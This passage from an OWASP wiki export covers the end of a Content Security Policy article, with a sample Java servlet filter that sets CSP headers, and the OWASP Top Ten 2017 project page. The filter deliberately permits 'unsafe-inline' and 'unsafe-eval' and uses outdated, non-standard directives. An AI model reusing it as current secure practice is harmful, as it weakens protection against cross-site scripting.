* '''reflected-xss''' : Instructs a user agent to activate or deactivate any heuristics used to filter or block reflected cross-site scripting attacks, equivalent to the effects of the non-standard X-XSS-Protection header,&lt;br /&gt;
*  '''report-uri''' : Specifies a URI to which the user agent sends reports about policy violation&lt;br /&gt;
&lt;br /&gt;
An introduction to CSP is available on [http://www.html5rocks.com/en/tutorials/security/content-security-policy/ HTML5Rocks].  The browser support is shown on http://caniuse.com/#feat=contentsecuritypolicy&lt;br /&gt;
&lt;br /&gt;
== Risk ==&lt;br /&gt;
The risk with CSP can have 2 main sources:&lt;br /&gt;
# Policies misconfiguration,&lt;br /&gt;
# Too permissive policies.&lt;br /&gt;
&lt;br /&gt;
== Countermeasure ==&lt;br /&gt;
This article will focus on providing an sample implementation of a JEE Web Filter in order to apply a set of CSP policies on all HTTP response returned by server. &lt;br /&gt;
&lt;br /&gt;
The policies will instruct the browser to have the loading behavior below using all HTTP headers defined in W3C Specs:&lt;br /&gt;
* Explicit loading definition of each resource type,&lt;br /&gt;
* Resources are loaded only from source domain,&lt;br /&gt;
* Inline style is not allowed,&lt;br /&gt;
* For JavaScript:&lt;br /&gt;
** ''Inline script'' will be allowed because inline scripting is commonly used (can be disabled if target site does not use this type of scripting),&lt;br /&gt;
** ''eval()'' function will be allowed in order to not break use of popular JavaScript libraries (ex: JQuery, JQueryUI, Sencha, ...) because they use eval() function (it was the case last time I have checked the source code from CDN ;) ),&lt;br /&gt;
* Generation of a random not guessable script nonce to use into all script tags,&lt;br /&gt;
* Plugin types only allow PDF and Flash,&lt;br /&gt;
* No font loading (configurable),&lt;br /&gt;
* No Audio / Video loading (configurable),&lt;br /&gt;
* Enable browser XSS filtering feature.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre style=&amp;quot;color:navy&amp;quot;&amp;gt;&lt;br /&gt;
The support for CSP directives is not the same level in major browsers (Firefox/Chrome/IE). It's recommanded to check the support &lt;br /&gt;
provided by target browsers  (using site provided in link section of this article) in order to configure CSP policies. The sample &lt;br /&gt;
below try to provide a set of policies from which your can add policies specific to your application context.&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''This implementation provide an option to add CSP directives used by Firefox (Mozilla CSP directives).''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
import java.io.IOException;&lt;br /&gt;
import java.security.MessageDigest;&lt;br /&gt;
import java.security.NoSuchAlgorithmException;&lt;br /&gt;
import java.security.SecureRandom;&lt;br /&gt;
import java.util.ArrayList;&lt;br /&gt;
import java.util.List;&lt;br /&gt;
&lt;br /&gt;
import javax.servlet.Filter;&lt;br /&gt;
import javax.servlet.FilterChain;&lt;br /&gt;
import javax.servlet.FilterConfig;&lt;br /&gt;
import javax.servlet.ServletException;&lt;br /&gt;
import javax.servlet.ServletRequest;&lt;br /&gt;
import javax.servlet.ServletResponse;&lt;br /&gt;
import javax.servlet.annotation.WebFilter;&lt;br /&gt;
import javax.servlet.http.HttpServletRequest;&lt;br /&gt;
import javax.servlet.http.HttpServletResponse;&lt;br /&gt;
&lt;br /&gt;
import org.apache.commons.codec.binary.Hex;&lt;br /&gt;
&lt;br /&gt;
/**&lt;br /&gt;
 * Sample filter implementation to define a set of Content Security Policies.&amp;lt;br/&amp;gt;&lt;br /&gt;
 * &lt;br /&gt;
 * This implementation has a dependency on Commons Codec API.&amp;lt;br/&amp;gt;&lt;br /&gt;
 * &lt;br /&gt;
 * This filter set CSP policies using all HTTP headers defined into W3C specification.&amp;lt;br/&amp;gt;&lt;br /&gt;
 * &amp;lt;br/&amp;gt;&lt;br /&gt;
 * This implementation is oriented to be easily understandable and easily adapted.&amp;lt;br/&amp;gt;&lt;br /&gt;
 * &lt;br /&gt;
 */&lt;br /&gt;
@WebFilter(&amp;quot;/*&amp;quot;)&lt;br /&gt;
public class CSPPoliciesApplier implements Filter {&lt;br /&gt;
&lt;br /&gt;
	/** Configuration member to specify if web app use web fonts */&lt;br /&gt;
	public static final boolean APP_USE_WEBFONTS = false;&lt;br /&gt;
&lt;br /&gt;
	/** Configuration member to specify if web app use videos or audios */&lt;br /&gt;
	public static final boolean APP_USE_AUDIOS_OR_VIDEOS = false;&lt;br /&gt;
&lt;br /&gt;
	/** Configuration member to specify if filter must add CSP directive used by Mozilla (Firefox) */&lt;br /&gt;
	public static final boolean INCLUDE_MOZILLA_CSP_DIRECTIVES = true;&lt;br /&gt;
&lt;br /&gt;
	/** Filter configuration */&lt;br /&gt;
	@SuppressWarnings(&amp;quot;unused&amp;quot;)&lt;br /&gt;
	private FilterConfig filterConfig = null;&lt;br /&gt;
&lt;br /&gt;
	/** List CSP HTTP Headers */&lt;br /&gt;
	private List&amp;lt;String&amp;gt; cspHeaders = new ArrayList&amp;lt;String&amp;gt;();&lt;br /&gt;
&lt;br /&gt;
	/** Collection of CSP polcies that will be applied */&lt;br /&gt;
	private String policies = null;&lt;br /&gt;
&lt;br /&gt;
	/** Used for Script Nonce */&lt;br /&gt;
	private SecureRandom prng = null;&lt;br /&gt;
&lt;br /&gt;
	/**&lt;br /&gt;
	 * Used to prepare (one time for all) set of CSP policies that will be applied on each HTTP response.&lt;br /&gt;
	 * &lt;br /&gt;
	 * @see javax.servlet.Filter#init(javax.servlet.FilterConfig)&lt;br /&gt;
	 */&lt;br /&gt;
	@Override&lt;br /&gt;
	public void init(FilterConfig fConfig) throws ServletException {&lt;br /&gt;
		// Get filter configuration&lt;br /&gt;
		this.filterConfig = fConfig;&lt;br /&gt;
&lt;br /&gt;
		// Init secure random&lt;br /&gt;
		try {&lt;br /&gt;
			this.prng = SecureRandom.getInstance(&amp;quot;SHA1PRNG&amp;quot;);&lt;br /&gt;
		}&lt;br /&gt;
		catch (NoSuchAlgorithmException e) {&lt;br /&gt;
			throw new ServletException(e);&lt;br /&gt;
		}&lt;br /&gt;
&lt;br /&gt;
		// Define list of CSP HTTP Headers&lt;br /&gt;
		this.cspHeaders.add(&amp;quot;Content-Security-Policy&amp;quot;);&lt;br /&gt;
		this.cspHeaders.add(&amp;quot;X-Content-Security-Policy&amp;quot;);&lt;br /&gt;
		this.cspHeaders.add(&amp;quot;X-WebKit-CSP&amp;quot;);&lt;br /&gt;
&lt;br /&gt;
		// Define CSP policies&lt;br /&gt;
		// Loading policies for Frame and Sandboxing will be dynamically defined : We need to know if context use Frame&lt;br /&gt;
		List&amp;lt;String&amp;gt; cspPolicies = new ArrayList&amp;lt;String&amp;gt;();&lt;br /&gt;
		String originLocationRef = &amp;quot;'self'&amp;quot;;&lt;br /&gt;
		// --Disable default source in order to avoid browser fallback loading using 'default-src' locations&lt;br /&gt;
		cspPolicies.add(&amp;quot;default-src 'none'&amp;quot;);&lt;br /&gt;
		// --Define loading policies for Scripts&lt;br /&gt;
		cspPolicies.add(&amp;quot;script-src &amp;quot; + originLocationRef + &amp;quot; 'unsafe-inline' 'unsafe-eval'&amp;quot;);&lt;br /&gt;
		if (INCLUDE_MOZILLA_CSP_DIRECTIVES) {&lt;br /&gt;
			cspPolicies.add(&amp;quot;options inline-script eval-script&amp;quot;);&lt;br /&gt;
			cspPolicies.add(&amp;quot;xhr-src 'self'&amp;quot;);&lt;br /&gt;
		}&lt;br /&gt;
		// --Define loading policies for Plugins&lt;br /&gt;
		cspPolicies.add(&amp;quot;object-src &amp;quot; + originLocationRef);&lt;br /&gt;
		// --Define loading policies for Styles (CSS)&lt;br /&gt;
		cspPolicies.add(&amp;quot;style-src &amp;quot; + originLocationRef);&lt;br /&gt;
		// --Define loading policies for Images&lt;br /&gt;
		cspPolicies.add(&amp;quot;img-src &amp;quot; + originLocationRef);&lt;br /&gt;
		// --Define loading policies for Form&lt;br /&gt;
		cspPolicies.add(&amp;quot;form-action &amp;quot; + originLocationRef);&lt;br /&gt;
		// --Define loading policies for Audios/Videos&lt;br /&gt;
		if (APP_USE_AUDIOS_OR_VIDEOS) {&lt;br /&gt;
			cspPolicies.add(&amp;quot;media-src &amp;quot; + originLocationRef);&lt;br /&gt;
		}&lt;br /&gt;
		// --Define loading policies for Fonts&lt;br /&gt;
		if (APP_USE_WEBFONTS) {&lt;br /&gt;
			cspPolicies.add(&amp;quot;font-src &amp;quot; + originLocationRef);&lt;br /&gt;
		}&lt;br /&gt;
		// --Define loading policies for Connection&lt;br /&gt;
		cspPolicies.add(&amp;quot;connect-src &amp;quot; + originLocationRef);&lt;br /&gt;
		// --Define loading policies for Plugins Types&lt;br /&gt;
		cspPolicies.add(&amp;quot;plugin-types application/pdf application/x-shockwave-flash&amp;quot;);&lt;br /&gt;
		// --Define browser XSS filtering feature running mode&lt;br /&gt;
		cspPolicies.add(&amp;quot;reflected-xss block&amp;quot;);&lt;br /&gt;
&lt;br /&gt;
		// Target formating&lt;br /&gt;
		this.policies = cspPolicies.toString().replaceAll(&amp;quot;(\\[|\\])&amp;quot;, &amp;quot;&amp;quot;).replaceAll(&amp;quot;,&amp;quot;, &amp;quot;;&amp;quot;).trim();&lt;br /&gt;
	}&lt;br /&gt;
&lt;br /&gt;
	/**&lt;br /&gt;
	 * Add CSP policies on each HTTP response.&lt;br /&gt;
	 * &lt;br /&gt;
	 * @see javax.servlet.Filter#doFilter(javax.servlet.ServletRequest, javax.servlet.ServletResponse, javax.servlet.FilterChain)&lt;br /&gt;
	 */&lt;br /&gt;
	@Override&lt;br /&gt;
	public void doFilter(ServletRequest request, ServletResponse response, FilterChain fchain) throws IOException, ServletException {&lt;br /&gt;
		HttpServletRequest httpRequest = ((HttpServletRequest) request);&lt;br /&gt;
		HttpServletResponse httpResponse = ((HttpServletResponse) response);&lt;br /&gt;
&lt;br /&gt;
		/* Step 1 : Detect if target resource is a Frame */&lt;br /&gt;
		// Customize here according to your context...&lt;br /&gt;
		boolean isFrame = true;&lt;br /&gt;
&lt;br /&gt;
		/* Step 2 : Add CSP policies to HTTP response */&lt;br /&gt;
		StringBuilder policiesBuffer = new StringBuilder(this.policies);&lt;br /&gt;
&lt;br /&gt;
		// If resource is a frame add Frame/Sandbox CSP policy&lt;br /&gt;
		if (isFrame) {&lt;br /&gt;
			// Frame + Sandbox : Here sandbox allow nothing, customize sandbox options depending on your app....&lt;br /&gt;
			policiesBuffer.append(&amp;quot;;&amp;quot;).append(&amp;quot;frame-src 'self';sandbox&amp;quot;);&lt;br /&gt;
			if (INCLUDE_MOZILLA_CSP_DIRECTIVES) {&lt;br /&gt;
				policiesBuffer.append(&amp;quot;;&amp;quot;).append(&amp;quot;frame-ancestors 'self'&amp;quot;);&lt;br /&gt;
			}&lt;br /&gt;
		}&lt;br /&gt;
&lt;br /&gt;
		// Add Script Nonce CSP Policy&lt;br /&gt;
		// --Generate a random number&lt;br /&gt;
		String randomNum = new Integer(this.prng.nextInt()).toString();&lt;br /&gt;
		// --Get its digest&lt;br /&gt;
		MessageDigest sha;&lt;br /&gt;
		try {&lt;br /&gt;
			sha = MessageDigest.getInstance(&amp;quot;SHA-1&amp;quot;);&lt;br /&gt;
		}&lt;br /&gt;
		catch (NoSuchAlgorithmException e) {&lt;br /&gt;
			throw new ServletException(e);&lt;br /&gt;
		}&lt;br /&gt;
		byte[] digest = sha.digest(randomNum.getBytes());&lt;br /&gt;
		// --Encode it into HEXA&lt;br /&gt;
		String scriptNonce = Hex.encodeHexString(digest);&lt;br /&gt;
		policiesBuffer.append(&amp;quot;;&amp;quot;).append(&amp;quot;script-nonce &amp;quot;).append(scriptNonce);&lt;br /&gt;
		// --Made available script nonce in view app layer&lt;br /&gt;
		httpRequest.setAttribute(&amp;quot;CSP_SCRIPT_NONCE&amp;quot;, scriptNonce);&lt;br /&gt;
&lt;br /&gt;
		// Add policies to all HTTP headers&lt;br /&gt;
		for (String header : this.cspHeaders) {&lt;br /&gt;
			httpResponse.setHeader(header, policiesBuffer.toString());&lt;br /&gt;
		}&lt;br /&gt;
&lt;br /&gt;
		/* Step 3 : Let request continue chain filter */&lt;br /&gt;
		fchain.doFilter(request, response);&lt;br /&gt;
	}&lt;br /&gt;
&lt;br /&gt;
	/**&lt;br /&gt;
	 * {@inheritDoc}&lt;br /&gt;
	 * &lt;br /&gt;
	 * @see javax.servlet.Filter#destroy()&lt;br /&gt;
	 */&lt;br /&gt;
	@Override&lt;br /&gt;
	public void destroy() {&lt;br /&gt;
		// Not used&lt;br /&gt;
	}&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Tools ==&lt;br /&gt;
&lt;br /&gt;
[[Automated Audit using w3af|w3af]] audit tools (http://w3af.org) contain [https://github.com/andresriancho/w3af/blob/master/plugins/grep/csp.py plugin] to automatically audit web application to check if they correctly implement CSP policies. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre style=&amp;quot;color:#088A08&amp;quot;&amp;gt;&lt;br /&gt;
It's very useful to include this type of tools into a web application development process in order to &lt;br /&gt;
perform a regular automatic first level check (do not replace an manual audit and manual audit must be also conducted regularly).&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
You can also use  [https://www.oxdef.info/csp-tester CSP Tester (browser extension)] to build and test the policy for your web application.&lt;br /&gt;
&lt;br /&gt;
== Information links ==&lt;br /&gt;
* W3C Specifications: CSP 1.0  - http://www.w3.org/TR/CSP, CSP 1.1 - http://w3c.github.io/webappsec/specs/content-security-policy/csp-specification.dev.html&lt;br /&gt;
* Introduction to CSP: http://www.html5rocks.com/en/tutorials/security/content-security-policy&lt;br /&gt;
* CSP browser support: http://caniuse.com/#feat=contentsecuritypolicy&lt;br /&gt;
* CSP readiness browser testing: http://erlend.oftedal.no/blog/csp/readiness/&lt;br /&gt;
&lt;br /&gt;
[[Category:Java]]&lt;br /&gt;
[[Category: Injection]]&lt;br /&gt;
[[Category:Attack]]&lt;br /&gt;
[[Category:Injection Attack]]&lt;/div&gt;</summary>
		<author><name>Neil Smithline</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Category:OWASP_Top_Ten_Project&amp;diff=232461</id>
		<title>Category:OWASP Top Ten Project</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Category:OWASP_Top_Ten_Project&amp;diff=232461"/>
				<updated>2017-08-19T00:26:39Z</updated>
		
		<summary type="html">&lt;p&gt;Neil Smithline: upgraded Brian!!&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Main=&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:90px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File: flagship_big.jpg|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Flagship_Projects]]&amp;lt;/div&amp;gt;&lt;br /&gt;
{| style=&amp;quot;padding: 0;margin:0;margin-top:10px;text-align:left;&amp;quot; |-&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
== OWASP Top 10 2017 - Industry survey open and data call reopened==&lt;br /&gt;
&lt;br /&gt;
* All industry professionals are encouraged to complete this [https://goo.gl/forms/ltbKrdYrp4Qdl7Df2 &amp;lt;u&amp;gt;survey for new vulnerability categories&amp;lt;/u&amp;gt;] to help determine up to two items in the 2017 Top 10. The deadline for the survey is &amp;lt;b&amp;gt;30 August, 2017&amp;lt;/b&amp;gt;.&lt;br /&gt;
* The data call for the 2017 Top 10 has been reopened. The  [https://goo.gl/forms/tLgyvK9O74r7wMkt2 &amp;lt;u&amp;gt;call for data&amp;lt;/u&amp;gt;] is now reopened to allow for additional data to be collected for analysis. The new deadline for the extended data call is &amp;lt;b&amp;gt;18 September, 2017&amp;lt;/b&amp;gt;.&lt;br /&gt;
This [https://owasp.blogspot.com/2017/08/owasp-top-10-2017-project-update.html &amp;lt;u&amp;gt;OWASP blog posting&amp;lt;/u&amp;gt;] describes the process in detail. &lt;br /&gt;
&lt;br /&gt;
==OWASP Top 10 2017 – RC1 rejected==&lt;br /&gt;
&lt;br /&gt;
During the [https://owaspsummit.org/website/ &amp;lt;u&amp;gt;OWASP Summit 2017&amp;lt;/u&amp;gt;], several sessions took place discussing many different aspects of the OWASP Top 10, for example, governance and validation, the data collection process, data assessment and review of the new suggested A7 and A10.&lt;br /&gt;
Main [https://owaspsummit.org/Outcomes/Owasp-Top-10-2017/Owasp-Top-10-2017.html &amp;lt;u&amp;gt;outcomes of the OWASP Summit&amp;lt;/u&amp;gt;] include:&lt;br /&gt;
* RC1 of the OWASP Top 10 2017 has been rejected&lt;br /&gt;
* A1, A2, A3, A4, A5, A6, A8, A9 have been left untouched by consensus view&lt;br /&gt;
* Requirement to choose two additional items (-&amp;gt; see OWASP Top 10 2017 - Industry survey open and data call reopened)&lt;br /&gt;
* Feedback on the mailing list has been moved to the [https://github.com/OWASP/Top10/issues &amp;lt;u&amp;gt;issues list&amp;lt;/u&amp;gt;] in GitHub, please continue to contribute feedback there. &lt;br /&gt;
* The new OWASP Top 10 2017 is to be released in late November 2017.&lt;br /&gt;
* New project leadership put in place.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- I think it makes sense just to delete this text - Neil Smithline&lt;br /&gt;
==OWASP Top 10 - 2017 Release Candidate ==&lt;br /&gt;
&lt;br /&gt;
The release candidate for public comment was published 10 April 2017 and can be [https://github.com/OWASP/Top10/raw/master/2017/OWASP%20Top%2010%20-%202017%20RC1-English.pdf downloaded here]. OWASP plans to release the final OWASP Top 10 - 2017 in July or August 2017 after a public comment period ending June 30, 2017.&lt;br /&gt;
&lt;br /&gt;
Constructive comments on this [https://github.com/OWASP/Top10/raw/master/2017/OWASP%20Top%2010%20-%202017%20RC1-English.pdf OWASP Top 10 - 2017 Release Candidate] should be forwarded via email to the [https://lists.owasp.org/mailman/listinfo/Owasp-topten OWASP Top 10 Project Email List]. Private comments may be sent to [mailto:vanderaj@owasp.org Andrew van der Stock]. Anonymous comments are welcome. All non-private comments will be catalogued and published at the same time as the final public release. Comments recommending changes to the Top 10 should include a complete suggested list of changes, along with a rationale for each change. All comments should indicate the specific relevant page and section.&lt;br /&gt;
&lt;br /&gt;
--&amp;gt;&lt;br /&gt;
==OWASP Top 10 Most Critical Web Application Security Risks==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 is a powerful awareness document for web application security. It represents a broad consensus about the most critical security risks to web applications. Project members include a variety of security experts from around the world who have shared their expertise to produce this list.&lt;br /&gt;
&lt;br /&gt;
We urge all companies to adopt this awareness document within their organization and start the process of ensuring that their web applications minimize these risks. Adopting the OWASP Top 10 is perhaps the most effective first step towards changing the software development culture within your organization into one that produces secure code.&lt;br /&gt;
&lt;br /&gt;
==Translation Efforts==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 has been translated to many different languages by numerous volunteers. These translations are available as follows:&lt;br /&gt;
&lt;br /&gt;
* [[Top10#OWASP_Top_10_for_2013 | All versions of the OWASP Top 10 - 2013]]&lt;br /&gt;
* [[Top10#OWASP_Top_10_for_2010 | All versions of the OWASP Top 10 - 2010]]&lt;br /&gt;
* [[Top10#Translation_Efforts_2 | Information about the various translation teams]]&lt;br /&gt;
&lt;br /&gt;
==Licensing==&lt;br /&gt;
The OWASP Top 10 is free to use. It is licensed under the http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license, so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.&lt;br /&gt;
&lt;br /&gt;
{{Social Media Links}}&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
== What is the OWASP Top 10? ==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 provides:&lt;br /&gt;
&lt;br /&gt;
* '''A list of the 10 Most Critical Web Application Security Risks'''&lt;br /&gt;
&lt;br /&gt;
For each Risk it provides:&lt;br /&gt;
* A description&lt;br /&gt;
* Example vulnerabilities&lt;br /&gt;
* Example attacks&lt;br /&gt;
* Guidance on how to avoid&lt;br /&gt;
* References to OWASP and other related resources&lt;br /&gt;
&lt;br /&gt;
== Project Leaders ==&lt;br /&gt;
&lt;br /&gt;
* [[User:vanderaj | Andrew van der Stock]]&lt;br /&gt;
* [[User:Neil_Smithline | Neil Smithline]]&lt;br /&gt;
* [[User:T.Gigler | Torsten Gigler]]&lt;br /&gt;
* [[User:Brianglas | Brian Glas]]&lt;br /&gt;
&lt;br /&gt;
== Related Projects ==&lt;br /&gt;
&lt;br /&gt;
* [[OWASP_Mobile_Security_Project#Top_Ten_Mobile_Risks | OWASP Mobile Top 10 Risks]]&lt;br /&gt;
&lt;br /&gt;
* [[OWASP_Top_Ten_Cheat_Sheet | OWASP Top 10 Cheat Sheet]]&lt;br /&gt;
&lt;br /&gt;
* [[OWASP_Proactive_Controls | Top 10 Proactive Controls]]&lt;br /&gt;
&lt;br /&gt;
* [[OWASP_Top_10/Mapping_to_WHID | OWASP Top 10 Mapped to the Web Hacking Incident Database]]&lt;br /&gt;
&lt;br /&gt;
== Ohloh ==&lt;br /&gt;
&lt;br /&gt;
*https://www.ohloh.net/p/OWASP-Top-10&lt;br /&gt;
&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;padding-left:25px;width:200px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
== Quick Download ==&lt;br /&gt;
* [[Media:OWASP_Top_10_-_2013.pdf | OWASP Top 10 2013 - PDF]]&lt;br /&gt;
* [[Top_10_2013 | OWASP Top 10 2013 - wiki]]&lt;br /&gt;
* [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP_Top-10_2013%20-%20Presentation.pptx OWASP Top 10 2013 Presentation - Covering Each Item in the Top 10 (PPTX)].&lt;br /&gt;
&lt;br /&gt;
== Get Involved ==&lt;br /&gt;
* [https://lists.owasp.org/mailman/listinfo/Owasp-topten Project Email List]&lt;br /&gt;
* [https://github.com/OWASP/Top10/issues Top 10 Issues on GitHub]&lt;br /&gt;
&lt;br /&gt;
== News and Events ==&lt;br /&gt;
* [11 Jul 2017] OWASP Top 10 2017 – The appeal for data and opinions is still open&lt;br /&gt;
* [10 Apr 2017] OWAP Top 10 - 2017 Release Candidate Published&lt;br /&gt;
* [17 Dec 2016] OWASP Top 10 - 2017 Data Call Data Published&lt;br /&gt;
* [20 May 2016] OWASP Top 10 - 2017 Data Call Announced&lt;br /&gt;
* [12 Jun 2013] OWASP Top 10 - 2013 Final Released&lt;br /&gt;
* [Feb 2013] OWASP Top 10 - 2013 - Release Candidate Published&lt;br /&gt;
&lt;br /&gt;
==Classifications==&lt;br /&gt;
&lt;br /&gt;
   {| width=&amp;quot;200&amp;quot; cellpadding=&amp;quot;2&amp;quot;&lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot; rowspan=&amp;quot;2&amp;quot;| [[File:Owasp-flagship-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Flagship_Projects]]&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-builders-small.png|link=]]  &lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-defenders-small.png|link=]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Project_Type_Files_DOC.jpg|link=]]&lt;br /&gt;
   |}&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= OWASP Top 10 for 2017 Release Candidate 1 =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The 2017 OWASP Top 10 RC1 has been rejected. A [https://goo.gl/forms/ltbKrdYrp4Qdl7Df2 new survey for security professionals] and a [https://goo.gl/forms/tLgyvK9O74r7wMkt2 reopened data call] are now open. More details can be found on [https://owasp.blogspot.com/2017/08/owasp-top-10-2017-project-update.html this blog post]. &lt;br /&gt;
&lt;br /&gt;
The following text is now outdated and has been left strictly for historical purposes.&lt;br /&gt;
&lt;br /&gt;
==Historical/Outdated Information==&lt;br /&gt;
The release candidate for public comment was published 10 April 2017 and can be [https://github.com/OWASP/Top10/raw/master/2017/OWASP%20Top%2010%20-%202017%20RC1-English.pdf downloaded here.]. OWASP plans to release the final OWASP Top 10 - 2017 in July or August 2017 after a public comment period ending June 30, 2017.&lt;br /&gt;
&lt;br /&gt;
Constructive comments on this [https://github.com/OWASP/Top10/raw/master/2017/OWASP%20Top%2010%20-%202017%20RC1-English.pdf OWASP Top 10 - 2017 Release Candidate] should be forwarded via email to the [https://lists.owasp.org/mailman/listinfo/Owasp-topten OWASP Top 10 Project Email List]. Private comments may be sent to [mailto:vanderaj@owasp.org Andrew van der Stock]. Anonymous comments are welcome. All non-private comments will be catalogued and published at the same time as the final public release. Comments recommending changes to the Top 10 should include a complete suggested list of changes, along with a rationale for each change. All comments should indicate the specific relevant page and section.&lt;br /&gt;
&lt;br /&gt;
This release of the OWASP Top 10 marks this project’s fourteenth year of raising awareness of the importance of application security risks. This release follows the 2013 update, whose main change was the addition of 2013-A9 Use of Known Vulnerable Components. We are pleased to see that since the 2013 Top 10 release, a whole ecosystem of both free and commercial tools have emerged to help combat this problem as the use of open source components has continued to rapidly expand across practically every programming language. The data also suggests the use of known vulnerable components is still prevalent, but not as widespread as before. We believe the awareness of this issue the Top 10 - 2013 generated has contributed to both of these changes.&lt;br /&gt;
&lt;br /&gt;
We also noticed that since CSRF was introduced to the Top 10 in 2007, it has dropped from a widespread vulnerability to an uncommon one. Many frameworks include automatic CSRF defenses which has significantly contributed to its decline in prevalence, along with much higher awareness with developers that they must protect against such attacks.&lt;br /&gt;
&lt;br /&gt;
For 2017, the OWASP Top 10 Most Critical Web Application Security Risks (in the Release Candidate) are:&lt;br /&gt;
&lt;br /&gt;
* A1 Injection&lt;br /&gt;
* A2 Broken Authentication and Session Management&lt;br /&gt;
* A3 Cross-Site Scripting (XSS)&lt;br /&gt;
* A4 Broken Access Control (As it was in 2004)&lt;br /&gt;
* A5 Security Misconfiguration&lt;br /&gt;
* A6 Sensitive Data Exposure&lt;br /&gt;
* A7 Insufficient Attack Protection (NEW)&lt;br /&gt;
* A8 Cross-Site Request Forgery (CSRF)&lt;br /&gt;
* A9 Using Components with Known Vulnerabilities&lt;br /&gt;
* A10 Underprotected APIs (NEW)&lt;br /&gt;
&lt;br /&gt;
== 2017 Update Data Call Data ==&lt;br /&gt;
&lt;br /&gt;
DATA CALL RESULTS ARE NOW PUBLIC: The [https://github.com/OWASP/Top10/blob/master/2017/datacall/OWASP%20Top%2010%20-%202017%20Data%20Call-Public%20Release.xlsx?raw=true results of this data call have been made public here] as an Excel spreadsheet with 4 tabs. Three of the tabs have raw data as submitted, organized into three vulnerability data size categories: large, small, and none. A 4th tab includes some basic analysis of the large size submissions. The OWASP Top 10 project thanks all the submitters for their input to the OWASP Top 10 - 2017.&lt;br /&gt;
&lt;br /&gt;
On May 20, 2016, the Top 10 project made a public announcement of the data call for the 2017 update to the OWASP Top 10. Contributors filled out the Google form posted here:  [https://docs.google.com/forms/d/1sBMHN5nBicjr5xSo04xkdP5JlCnXFcKFCgEHjwPGuLw/viewform?c=0&amp;amp;w=1&amp;amp;usp=mail_form_link OWASP Top 10 - 2017 Data Call], which had the questions listed below.&lt;br /&gt;
&lt;br /&gt;
Page 1 of 5: Submitter Info&lt;br /&gt;
&lt;br /&gt;
* Name of Company/Organization *&lt;br /&gt;
* Company/Organization Web Site *&lt;br /&gt;
* Point of Contact Name *&lt;br /&gt;
* Point of Contact E-Mail *&lt;br /&gt;
&lt;br /&gt;
Page 2 of 5: Background on Applications&lt;br /&gt;
&lt;br /&gt;
* During what year(s) was this data collected? *&lt;br /&gt;
** 2014&lt;br /&gt;
** 2015&lt;br /&gt;
** Both 2014 &amp;amp; 2015&lt;br /&gt;
*** If the application vulnerability data you are submitting was extracted from a publicly available report, please provide a link to that report (or reports), and the relevant page number(s)&lt;br /&gt;
&lt;br /&gt;
* How many web applications do the submitted results cover? * We consider web apps, web services, and the server side of mobile apps to all be web apps.&lt;br /&gt;
&lt;br /&gt;
* What were the primary programming languages the applications you reviewed written in? Primary being 5% or more of the supplied results - Check all that apply&lt;br /&gt;
** Java&lt;br /&gt;
** .NET&lt;br /&gt;
** Python&lt;br /&gt;
** PHP&lt;br /&gt;
** Ruby&lt;br /&gt;
** Grails&lt;br /&gt;
** Play&lt;br /&gt;
** Node.js&lt;br /&gt;
** Other:&lt;br /&gt;
&lt;br /&gt;
* Please supply the exact percentage of applications per language checked off above:&lt;br /&gt;
&lt;br /&gt;
* What were the primary industries these applications supported? Primary being 5% or more of the supplied results - Check all that apply&lt;br /&gt;
** Financial&lt;br /&gt;
** Healthcare&lt;br /&gt;
** eCommerce&lt;br /&gt;
** Internet/Social Media&lt;br /&gt;
